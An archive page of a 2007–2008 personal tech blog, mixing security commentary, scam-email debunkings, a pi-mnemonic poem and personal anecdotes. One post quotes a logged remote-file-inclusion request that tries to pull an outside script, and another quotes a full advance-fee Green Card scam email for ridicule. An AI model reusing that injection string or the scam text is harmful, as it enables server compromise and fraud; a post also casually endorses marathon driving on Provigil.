You are here: Home / import

Vuln: MySQL MyISAM Table Privileges Secuity Bypass Vulnerability

July 14, 2008 By rjamestaylor

Vuln: MySQL MyISAM Table Privileges Secuity Bypass Vulnerability (source: SecurityFocus Vulnerabilities)

In all modern versions of MySQL (that is, beginning early in MySQL 4's development history) the use of the "CREATE TABLE ( ) DATA DIRECTORY … INDEX DIRECTORY …" command can be used to escalate privileges to access and change data created by other MySQL users. MySQL AB has changed MySQL 4 and MySQL 5 behavior to remedy this problem.

However, this is also a case to point out restricting direct RDBMS access to any untrusted system user or application and instead forcing all access to be made through the application layer. That is, of course, as long as one locks down the application layer's access to the RDBMS, too! Besides controlling access for security purposes, managing access at the application layer improves chance of enforcing business rules with the database (without resorting to stored procedures and triggers).

– Robot Terror

Filed Under: How-to, Web, import, robotterror.com Tagged With: security

20 years old again — thanks, Provigil®

June 28, 2008 By rjamestaylor

I just completed a 3 week vacation to California from Texas including several points in between. The last leg of the 5,065 mile journey was a 22 hour marathon from Long Beach, CA to San Antonio, TX. I drove all but 10 minutes of the trip. Oh, and I had my wife and 3 kids — ages 8, 6, and 4 — in the van, too.

I left Friday at 7:30 PM PDT and arrived at home in San Antonio, TX, at 7:30 PM CDT. That's exactly (!) 22 hours.

When I was 20 years old I made several trips from Dallas to Orange County in 22 to 24 hours. Usually with the assistance of another driver who took the wheel while I slept. That ended shortly after hitting 30 years of age. Making this drive in two segments with a Motel 6 stay in between was as rough as I could get. Sometimes the trip would take 3 days.

Now, as a 41 year old, the trip was easier than when I was in my teens or twenties. No kidding. The difference? Provigil®. I took one at 7:30 PM CDT after having been awake from 7AM with an estimated 45 minute nap in the interim. Also, about 2PM/3PM CDT I took a 10 minute nap between Ozona and Sonora, TX. Otherwise, only children's bathroom or feeding crises stood between me and the goal of reaching San Antonio ASAP.

Right now, the kids are happily sleeping at home. The wife is relaxing in her own bed and I am on the computer (as usual).

Why am I not asleep at a rest stop or paying $$$ to a cheap-rate motel? Provigil® gives me the awakeness and lucid focus I need to keep going. It's just what my doctor ordered for my late night/day time switching schedule.

Ask your doctor about Provigil® to see if it may be right for you.

Filed Under: General, import, robotterror.com

Leadership without respect is an empty vessel

May 28, 2008 By rjamestaylor

Without respect from those one leads, there is no leadership; only, delayed mutiny.

Leadership is a quality, not an office. Real leadership is not bestowed but recognized. Leadership is not authority; authority is right. Leadership is not power; power is might. Leadership is essential but ephemeral — to grasp it is to lose it.

The reason for the above is that I witnessed an odd situation recently. At an organization I respect there was an opportunity for some to act as gatekeepers into leadership of that organization, yet, the ones given such opportunity failed to exercise their right. It dawned on me that these ones must not treasure the leadership role in this beloved organization if they could so easily refuse to participate in the gatekeeper function. The gatekeeper function is two-fold: on one hand, it protects the leadership from an unqualified addition, on the other hand it helps to bring in qualified additions that might be otherwise excluded. Either negative result damages leadership in the organization. To be so nonchalant that one doesn't participate when able shows disregard not for the applicants but for the leadership.

Being in a leadership role is not easy. It's not a matter of just doing specific tasks well but also of how one's demeanor and actions outside of specific work tasks affect others. The Apostle Paul said that while he was free according to the law of the Gospel to eat meat sacrificed to idols, for the sake of those who did not have the same understanding he would refrain from eating such meat so that they would not be stumbled. This is taking the view of the team as more important than one's own right. Whatever one thinks of the Apostle Paul and his message, no one can deny that his approach to building a team and a world-class organization excels — what organization has lasted longer than the Church his work and writings help found?

It appears that some day I may enter into a role that involves leadership. It is my sincere hope to remember this experience and this post to guide my actions in such a role.

Filed Under: General, import, robotterror.com Tagged With: leadership

In honor of pi day (Mar 14)

March 14, 2008 By rjamestaylor

In honor of pi day (3/14 @ 1:59) I am repeating the most creative rendering of known digits of π, "Near a Raven." Bask in the genius of this early Internet posting (after the jump): <!–break–> 

From ian#NoSpam.iglou.com Sat Dec 23 03:25:11 1995
http://users.aol.com/s6sj7gt/mikerav.htm Poe, E.: Near A Raven

The poem below, which bears an uncanny similarity to a certain famous poem
by Edgar Allen Poe, is my latest and most difficult attempt at constrained
writing. Constrained writing is the art of constructing a work of prose or
poetry that obeys some artificially-imposed constraint. For example, there
are two published novels from which the letter 'e' is absent - Gadsby, by
Ernest Vincent Wright (1938), and La Disparition by George Perec (still in
print, and even available in a very recent English translation (A Void,
translated by Gilbert Adair) that also obeys the constraint!).

Your mission, should you decide to accept it, is to figure out the
constraint imposed on this poem. The answer is given after the end, so if
you want to try to figure it out, just look at the beginning of the poem.

      Poe, E.
   Near A Raven

Midnights so dreary, tired and weary.  Silently pondering volumes extolling
all by-now obsolete lore.  During my rather long nap - the weirdest tap!
An ominous vibrating sound disturbing my chamber's antedoor.
    "This", I whispered quietly, "I ignore".

Perfectly, the intellect remembers: the ghostly fires, a glittering ember.
Inflamed by lightning's outbursts, windows cast penumbras upon this floor.
Sorrowful, as one mistreated, unhappy thoughts I heeded:
  That inimitable lesson in elegance - Lenore -
    Is delighting, exciting...nevermore.

Ominously, curtains parted (my serenity outsmarted), And fear overcame my
being - the fear of "forevermore".  Fearful foreboding abided, selfish
sentiment confided, As I said, "Methinks mysterious traveler knocks afore.
    A man is visiting, of age threescore."

Taking little time, briskly addressing something: "Sir," (robustly) "Tell
what source originates clamorous noise afore?  Disturbing sleep unkindly,
is it you a-tapping, so slyly?  Why, devil incarnate!--" Here completely
unveiled I my antedoor-- Just darkness, I ascertained - nothing more.

While surrounded by darkness then, I persevered to clearly comprehend.
  I perceived the weirdest dream...of everlasting "nevermores".  Quite,
quite, quick nocturnal doubts fled - such relief! - as my intellect said,
  (Desiring, imagining still) that perchance the apparition was uttering a
whispered "Lenore".
    This only, as evermore.

Silently, I reinforced, remaining anxious, quite scared, afraid,
  While intrusive tap did then come thrice - O, so stronger than sounded
afore.  "Surely" (said silently) "it was the banging, clanging window
lattice."
  Glancing out, I quaked, upset by horrors hereinbefore,
    Perceiving: a "nevermore".

Completely disturbed, I said, "Utter, please, what prevails ahead.
  Repose, relief, cessation, or but more dreary 'nevermores'?"  The bird
intruded thence - O, irritation ever since! -
  Then sat on Pallas' pallid bust, watching me (I sat not, therefore),
    And stated "nevermores".

Bemused by raven's dissonance, my soul exclaimed, "I seek intelligence;
Explain thy purpose, or soon cease intoning forlorn 'nevermores'!"
"Nevermores", winged corvus proclaimed - thusly was a raven named?
  Actually maintain a surname, upon Pluvious seashore?
    I heard an oppressive "nevermore".

My sentiments extremely pained, to perceive an utterance so plain,
  Most interested, mystified, a meaning I hoped for.  "Surely," said the
raven's watcher, "separate discourse is wiser.
  Therefore, liberation I'll obtain, retreating heretofore -
    Eliminating all the 'nevermores' ".

Still, the detestable raven just remained, unmoving, on sculptured bust.
  Always saying "never" (by a red chamber's door).  A poor, tender
heartache maven - a sorrowful bird - a raven!
  O, I wished thoroughly, forthwith, that he'd fly heretofore.
    Still sitting, he recited "nevermores".

The raven's dirge induced alarm - "nevermore" quite wearisome.
  I meditated: "Might its utterances summarize of a calamity before?"  O, a
sadness was manifest - a sorrowful cry of unrest;
  "O," I thought sincerely, "it's a melancholy great - furthermore,
    Removing doubt, this explains 'nevermores' ".

Seizing just that moment to sit - closely, carefully, advancing beside it,
  Sinking down, intrigued, where velvet cushion lay afore.  A creature,
midnight-black, watched there - it studied my soul, unawares.
  Wherefore, explanations my insight entreated for.
    Silently, I pondered the "nevermores".

"Disentangle, nefarious bird! Disengage - I am disturbed!"
   Intently its eye burned, raising the cry within my core.  "That
delectable Lenore - whose velvet pillow this was, heretofore,
  Departed thence, unsettling my consciousness therefore.
    She's returning - that maiden - aye, nevermore."

Since, to me, that thought was madness, I renounced continuing sadness.
  Continuing on, I soundly, adamantly forswore: "Wretch," (addressing
blackbird only) "fly swiftly - emancipate me!"

  "Respite, respite, detestable raven - and discharge me, I implore!"
    A ghostly answer of: "nevermore".

" 'Tis a prophet? Wraith? Strange devil? Or the ultimate evil?"
  "Answer, tempter-sent creature!", I inquired, like before.  "Forlorn,
though firmly undaunted, with 'nevermores' quite indoctrinated,
  Is everything depressing, generating great sorrow evermore?
    I am subdued!", I then swore.

In answer, the raven turned - relentless distress it spurned.
  "Comfort, surcease, quiet, silence!" - pleaded I for.  "Will my (abusive
raven!) sorrows persist unabated?
  Nevermore Lenore respondeth?", adamantly I encored.
    The appeal was ignored.

"O, satanic inferno's denizen -- go!", I said boldly, standing then.

  "Take henceforth loathsome "nevermores" - O, to an ugly Plutonian shore!
Let nary one expression, O bird, remain still here, replacing mirth.

  Promptly leave and retreat!", I resolutely swore.
    Blackbird's riposte: "nevermore".

So he sitteth, observing always, perching ominously on these doorways.
  Squatting on the stony bust so untroubled, O therefore.  Suffering stark
raven's conversings, so I am condemned, subserving,
  To a nightmare cursed, containing miseries galore.
    Thus henceforth, I'll rise (from a darkness, a grave) -- nevermore!

            -- Original: E. Poe
            -- Redone by measuring circles.

Solution:

Despite the rather difficult constraint (to be revealed shortly), observe
how this revised version of "The Raven" duplicates the story, tone, and
rhyme scheme of the original fairly closely (including the internal rhymes
in the first and third line of each stanza). The only major concession to
the form is that the original has six lines per stanza, with the fourth and
fifth lines usually being very similar. Due to the nature of the constraint
I imposed (revealed in the next paragraph), this would have been nearly
impossible to do. Therefore, this version eliminates the similar line in
each stanza.

Give up? Hint: Start at the very beginning (with the word 'Poe') and write
next to each word the number of letters it contains. Put a decimal point
after the first digit. Look at the first few digits (or more if, like me,
you know the first several hundred by heart).  Are you impressed yet?

Even given the rather difficult constraint, I was able to match the
original very closely in spots. The very first line, although its meter is
wrong, is surprisingly close. Others which are very close, even to the
point of using many of the same words, are stanza 4 line 5, stanza 6 line
3, stanza 7 line 4, and stanza 15, line 1.

Note the use of the term "blackbird" a couple of times. Though not,
strictly speaking, correct (a raven is a black bird, not a blackbird), the
term is particularly appropriate. It is a subtle reference to George
Perec's La Disparition, which contains another written-with-constraints
version of "The Raven" - in this case the constraint being "write it in
French without using the letter 'e'".  In the English translation of La
Disparition by Gilbert Adair, the poem is faithfully translated into
English, also without using letter 'e'. The English version of the poem is
titled (wait for it...) Black Bird!

The poem encodes the first 740 decimals of pi. The encoding rule is this: a
word of N letters represents the digit N if N<9, the digit 0 if N=10, and
two adjacent digits if N>10 (e.g., a 12-letter word represents the digit
'1' followed by '2').

A much less well-known example is this nice poem by Joseph Shipley (1960):

     But a time I spent wandering in bloomy night;
     Yon tower, tinkling chimewise, loftily opportune.
     Out, up, and together came sudden to Sunday rite,
     The one solemnly off to correct plenilune.

I believe that "Near a Raven" establishes the world record for length of a
pi mnemonic. I would be glad to hear of other wordy attempts, either in
prose or poetry. Perhaps someone would like to attempt a short story or a
novel?!

Source: http://www.xs4all.nl/~jcdverha/scijokes/11_2.html

UPDATE: Check out ZOOM-take off tribute to PI: http://www.youtube.com/watch?v=mDu351QNoZE (Thanks, Ed!)

Filed Under: General, import, robotterror.com

DOOMLA: The wave of compromised OS X Server installations starts in 3…2…1…

March 4, 2008 By rjamestaylor

Apple's Open Source download page has a new featured package that is guaranteed to raise the profile of Mac OS X Server on the list of exploited servers: Joomla!, or, as I'm starting to call it, DOOM-LA. DOOM-LA <!–break–> If you don't know why Joomla is veritible DOOMLA for any server, just have a look at the list of known (known!) exploits: 

2008-02-23     Joomla Component simple shop 2.0 SQL Injection Vulnerability
2008-02-20     Joomla Component com_hwdvideoshare SQL Injection Vulnerability
2008-02-18     Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability
2008-02-18     Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability
2008-02-18     Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability
2008-02-16     Joomla Component com_galeria Remote SQL Injection Vulnerability
2008-02-16     Joomla Component jooget <= 2.6.8 Remote SQL Injection Vulnerability
2008-02-14     Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit
2008-02-14     Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability
2008-02-14     Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability
2008-02-14     Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability
2008-02-13     Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability
2008-02-12     Joomla Component pcchess <= 0.8 Remote SQL Injection Vulnerability
2008-02-12     Joomla Component rapidrecipe <= 1.6.5 SQL Injection Vulnerability
2008-02-08     Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
2008-02-07     Joomla Component com_noticias 1.0 SQL Injection Vulnerability
2008-02-07     Joomla Component com_doc Remote SQL Injection Vulnerability
2008-02-06     Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
2008-02-03     Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability
2008-02-03     Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
2008-02-01     Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln

And that's just since February 2008. Yeah. Mac OS X is DOOM-LA'ed. Thanks, Apple!

Filed Under: Tech, import, robotterror.com

The evil truth: what really sizzles the Internet’s most powerful computer’s chips

February 26, 2008 By rjamestaylor

I'm reading Clive Cussler's Atlantis Found which has an AI computer named Max (female, though) who (!) is able to reason and think with her creator/peer. In the story, while "she" crunches data she tells her creator/peer: "Go home Hiram [the creator/peer]. Take your wife and daughters to a movie. Get a good night's sleep while I sizzle my chips. Then, when you sit down in the morning, I'll really have information that will curl your ponytail." She, Max, the AI computer progeny of Hiram the Ponytailed Geek, is referring to crunching the mysteries of a pre-historical intelligent race of mankind that pre-dates the Egyptians and Summerians.

But as I read this I am disgusted by the truth. The truth is while people sleep the world's most powerful Internet-connected computers process not mystery-solving data but spam. Spam in email, spam in blog postings, spam in every conceivable venue that will attract people's attention. /|Ag4A, Cia|1s, pre-approved credit cards, "The occasion of my letter may be a surprise to you" windfalls, lost money found, and promises of larger, more erect manhood are the things that keep the most advanced and powerful systems generating Earth Destroying heat in every Internet-facing datacenter in the world.

Spam is the subject of Hal and Max. Not mysteries of other worlds, races, peoples. Not the futures of our civilization. No. Your credit score / penis size; this is the focus of modern technology.

Welcome to the real world, red pill or not, Copper-top.

Filed Under: Tech, import, robotterror.com

SPAM: Robot Terror’s Selection Into Princeton Premier

February 20, 2008 By rjamestaylor

Flattery may get you nowhere but it sure can help build your “double opt-in” spam list. Taking a page from long-term vanity publisher Who's Who, some outfit calling itself “Princeton Premier” is looking to flatter people into divulging their contact information including “the best time to contact.” Let me make this perfectly clear: the reason a company asks for the best time to contact you is that they intend to contact you. Yes, that is the Monty Python “Spam, spam, spam, spam” theme song playing in your subconscious right now. Princeton Premier hopes your personal vanity drowns out your better judgement, however, with claims like “Inclusion is considered by many as the single highest mark of achievement.”

Just remember this: if they are including “Robot Terror” how prestigious is this registry, anyway?

Robot Terror,  

It is my pleasure to inform you that you are being considered for inclusion into the 2008-2009 Princeton
Premier Business Leaders and Professionals "Honors Edition" section of the Registry.

The 2008-2009 edition of the Registry will include biographies of the world's most accomplished
individuals. Recognition of this kind is an honor shared by thousands of executives and professionals
throughout the world each year. Inclusion is considered by many as the single highest mark of
achievement.

Upon final confirmation, you will be listed among thousands of accomplished individuals in the Princeton
Premier Registry. 

For accuracy and publication deadlines, please complete your application form and return it to us within
five business days. 

You may access the application form using the following link:

http://app.formassembly.com/forms/view/3366

On behalf of the Managing Director, we wish you continued success.

Sincerely, 

Jason Harris 

Managing Director
Princeton Premier

This email was sent to redacted@robotterror.com, by
Princeton Premier

23-35a Steinway Street
Astoria, NY 11105 United States 

If you do not wish to receive future e-mail
from Princeton Premier, please use the link below.

http://rm.resultsmail.com/unsubscribe.cfm?uid=[redacted]

Powered by ResultsMail (http://www.resultsmail.com/)

ResultsMail Privacy Policy: http://www.resultsmail.com/privacy
ResultsMail Permission Email Policy: http://www.resultsmail.com/permission

At the hosted mail form page (how lame!) are the following fields to be filled out by the honorees:

     First Name: *
     Last Name:  *
     Job Title:  *
     Company Name:
     Phone Number:  *
     Email:  *
     Full Address:
     Country:
     Personal Specialty:
     Best Time To Contact: Morning Afternoon Evening

Thankfully this appears to simply be a mailing list building ruse and not a full-fledged phishing scam. However, there is not a big jump from connecting the requested information with other data sources to provide con-artists what they need to steal your identity. I wonder what the follow-up questions are going to be — will the bio have a standard format that includes your parents' names? With the above information and your mother's maiden name I have most of what I need to get access to your bank accounts. Scary.

RECOMMENDATION: Junk this solicitation!


Update: I filled out the form and visited the site. It is a social networking site built on phpFox. (They've not even turned off the “Safari warning pop-up” … lame.) Yeah. It's an attempt to make another LinkedIn. Guess what? FAIL.

Filed Under: import, robotterror.com, scams

What if the password generators are hacked?

January 30, 2008 By rjamestaylor

For many years I have recommended the use of online (and off-line) password generators for people needing assistance with making relatively strong passwords. But I've long had this nagging suspicion trying to express itself and yet have not until now. Right now, in fact.

What if the password generators are hacked or compromised? More specifically, what if the password generators choose from a set list of passwords that brute-force attackers then use in their automated attacks? Or, what if the list of generated passwords is compromised and, worse, related to the requesting IP address?

Limiting the possibilities of passwords dramatically increases the chances of brute-force password attacks succeeding.

A client once asked why he needed to change a password that had been guessed by an attacker — after all "X" website rated the password as "Very Strong". I told him about my favorite password of all time — the one used to launch the US nuclear missiles aimed at the Soviet Union in the movie Wargames. For the last several minutes of the film the password CPE1704TKS is flashing on the screen. Finally the computer realizes that thermonuclear war is less competitive than tic-tac-toe and stops the launch. Just because CPE1704TKS is a nice, letter/number combination that is not related to my user name, domain or pet iguana, doesn't mean I should use it for anything. After all, it's a well-known password. The client understood this (non-technical) explanation and changed his password (probably to CPE1704TKS1, but that's another story).

So, just as one cannot use a well-known password, even if it is well-formed, should we encourage the use of programmatically generated or, even more suspicious, website generated passwords?

Tell me what you think.

Robot.

Filed Under: Tech, import, robotterror.com

Vector of compromise: mosConfig_absolute_path

January 28, 2008 By rjamestaylor

While reviewing my logs for recent hits on my blog I came across the following request:

 

 URL: /mosConfig_absolute_path%3Dhttp%3A/[...]/f1.txt
 Date: Monday, January 28, 2008 - 05:59
 Remote Host: 69.57.148.17

 

Fortunately I am not using Mambo or Joomla (though the blog-ware I am using has its own troubles) or I would have been infected with malware that would turn my server into an attack platform for DDoS attacks, spam, IRC, phishing scams and a host of illegal content of all kinds.

So, let me ask you: is your server able to survive such an automated attack as this? Is it already serving illegal purposes?

Filed Under: How-to, Web, import, robotterror.com

SCAM: “Congratulation! You have received an OFFICIAL USA Green Card Letter.”

December 15, 2007 By rjamestaylor

It's time for another episode of “stupid advance fee scams that target the gullible.” This time, the scammers pretend to represent the US Government. Yes, this is the “Congratulation! You have received an OFFICIAL USA Green Card Letter.” scam-mail. This letter would have you believe that the US government is awarding Green Cards to email address holders…and is using mail.com (a free email service) to process its award notifications. Read on for the email, analysis and chuckles.

                                                                           Office # 1793
                                                                                                    14781 Memorial Drive
                                                                                                    Houston, TX 77079  USA
From the U.S. Department
of State Bureau of Consular
Affairs Visa Services:
www.usagreencardlottery.org

Case Number: 411DVL2H23320L1
Preferences Categories:  DV DIVERSITY
Foreign State Chargeability: Asia-Pacific

Dear Winner.
We wish to notify you that you are among the selected lucky winners of the U.S visa lottery (Green Card) through our email
ballot lottery program held on the 20th of October 2007 in Arkansas (USA) The Green Card email ballot lottery program was
conducted under the terms of Section 203 of the Immigration and Nationality Act (INA) Section 131 of the Immigration Act of
2006 (Pub.L.101-649) The aims and objectives of the program is to give free visas to citizens of developing countries around
the world who wishes to travel to U.S and start a new life and work.

Selection.
6.3 million email addresses were randomly extracted during the 33-days extraction period that ran from 12.00 AM on September 10,
2007 until midnight, October, 9 2007. All extracted email addresses were assigned to different ticket numbers for representation
and privacy for final selection through computer draw system, your email address attached to ticket number 56402-188 drew the
lucky numbers which subsequently won you the U.S Green Card.

Notification is through the selected winning email addresses with the PA names, approximately six hundred and twenty five (625)
lucky selected winners had been notified through their selected winning email addresses.  All the selected lucky winners will
need to obtain their visas from any of the U.S Embassies and arrive here in the USA for the issuance of their Green Cards under
the U.S Government Green Card lottery program and they should act on their visa claim application quickly before the expiration
of the visa claim extended deadline which is on the (20-1-2008)

The visas have been apportioned among the six geographic regions with a maximum of seven percent available to persons born in any
single country, our Green Card experts had been apportioned among the six geographic regions. Your visa duration is 10 years
multiple entries to the U.S, it is renewable upon expiration and it permits you to travel to the U.S with your spouse.

Basic question.
How can I make the claim of my visa?
You will obtain your visa through the U.S Consular officer in your home country or any of the U.S Embassy nearest to you with your
Green Card Certificates and visa claim application documents and arrive here in U.S for the issuance of your Green Card. Selected
lucky winners living legally in the United States who wish to pursue their Green Card status should contact any of our regional
offices where their winning details falls for information's on the requirements and procedures.

Visa claim application (step 1)
Your Green Card winning details falls within our Asia/pacific booklet representative office as indicated in the draw system and we
have forwarded your winning details to our Asia/Pacific office for the processing of your Green Card Certificates and visa claim
application documents with your case number which will enable you to obtain your visa, therefore, FOR YOUR VISA PROCESSING FORM,
REQUIREMENTS AND FURTHER DETAILS, contact our Asia/pacific Region Processing Office with the below contact details;

CONTACT PERSON: MR.MICHAEL MORROW
Address: 377 Wichayanond Road, Chiang Mai 50300, Thailand
Tel: +66-26-5343 29  Hotline +66-8 471 060 74.
Fax: +66-2- 234 9834
Email:  region.office@sfax.ws

Processing Fee. $755USD
What is processing fee?
The processing fee pays for the accuracy preparation of every document. Green card experts charges a nominal fee to cover
administrative and processing costs incurred in conjunction with the careful processing of every document.

Advanced question.
How can I pay the processing fee?
The following forms of payment are accepted,
Money orders
Bank transfers
Western Union

The payment of the processing fee should be directed to any of our regional office where your winning details falls for the
processing of your Green Card Certificates and visa claim application documents. According to J.Stevenson Wilson, Author of
Visa Lottery services Report, the green card Lottery is a matter of huge benefits for those who want to try themselves abroad.
The total average fee charged by green card lottery services ($755USD) for one person,there is no correlation between the fee
charged and the quality of services provided and its benefits.

Benefits.
Winners will get FREE Airline Ticket to the USA.
people that win this Lottery will get the constant legal status of the US inhabitant, an opportunity of free country entrance
and departure, the right to be working in the USA legally and getting American salary. You may have any job in America, whether
it is a government, public or private job. A permanent residence visa (as well as American work visa) eases your life. In
addition to permanent legal residence Green Card holders also receive health, education, retirement, taxation, social security
and other benefits.

Non-Eligible Countries.
Selected winners from the following countries are not eligible to make the claim of their visas.
(Mexico-Brazil-Canada-Haiti-Columbia-Elsalvador-Jamaica-Poland-Peru-Korea-Dominican Republic-Philippines-Vietnam-Taiwan-China
(mainland born) Russia and United-Kingdom (except Northern Ireland) and its dependent countries) This is because each has more
than 50, 000 candidates in the USA.

US Embassies and Consulates.
US Embassies and consulates does not issue Green Cards, they issue all types of visas after visa interview, you will obtain your
visa from any of the US Embassy when directed and arrive here in the USA for the issuance of your Green Card.
All selected lucky winners should follow the instructions in their notification letter and must fully complete the information
requested and should go to the U.S Embassy when directed with their Green Card acknowledgement processed documents and interview
appointment letters for the issuance of their visas.

Please read and follow all the enclosed instructions very carefully.
Do not reply back to this notification email (busy)

Sincerely yours,
Mrs.Jesica Morre.

(Secretary General U.S Consulate-Kentucky)

--
10 Great Gift Ideas - Take a Look!
mail.com Shopping

Again, the scammers have increased the boundaries of audacity to claim to represent the US government. If you are wanting a US Green Card, this email is targeted for you. Should you be convinced that the US is randomly sending email notifications using a free email service … well… lets just say that travel abroad is probably not the best thing for you to engage in; stay home near people who can look out for your best interests.

Some observations:

  • “Congratulation!”

    Ah, yes. This mistaken singularization of the idiomatic plural exclamation, “congratulations!” is a standard tip-off that the sender is either not a native English speaker/writer or is not proofreading their “official documentation.” Either case indicates this is likely not a US Government document.

  • Selection: random e-mail addresses chosen from pool of 6.3 million.

    This is probably the only true item in this scam-mail. The scammers have access to a small database of 6.3 million addresses harvested from various means. In my case, the email address used is one that I have posted in a very conspicuous place on one of the most popular community web sites on the Internet. Any mail to that address is likely spam/scam. I redirect to GMail to handle the extreme amount of junk. It is highly unlikely that the US Government uses random e-mail address selection methods to determine Green Card holders.

  • “Processing Fee. $755USD”

    Forgetting that the proper designation of USD currency amounts is “USD$755″, this is the profit part of the scam. To obtain this “Free” Green Card you've “won” just submit a nominal fee of “USD$755″ to insure careful processing. I assume the fee ensures “accuracy processing” on the same scale as the professionally produced email notification we are now reading. Perhaps we should send an extra amount to improve the “accuracy processing.”

  • Since when is there a US Consulate in Kentucky?
  • “10 Great Gift Ideas – Take a Look!”

    How helpful! A free Green Card for $USD755, a free airline ticket to the US, and helpful shopping hints from Mail.com, the free email service used by the US Government to notify me of winning the Green Card lottery!

These confidence games via email are so ridiculous. Unfortunately, they WORK. I know people are confused when they receive these scam-mailings. My previous article on a scam-mail, The Catholic Church (Italy) is giving out donations!, is by far the most requested page on my site. I put this article up as a service to those people hoping to come to the US legally so that if they are able to find this page they can be saved the loss of USD$755 (and worse!).

Filed Under: import, robotterror.com, scams
« Older Posts

Bad Behavior has blocked 247 access attempts in the last 7 days.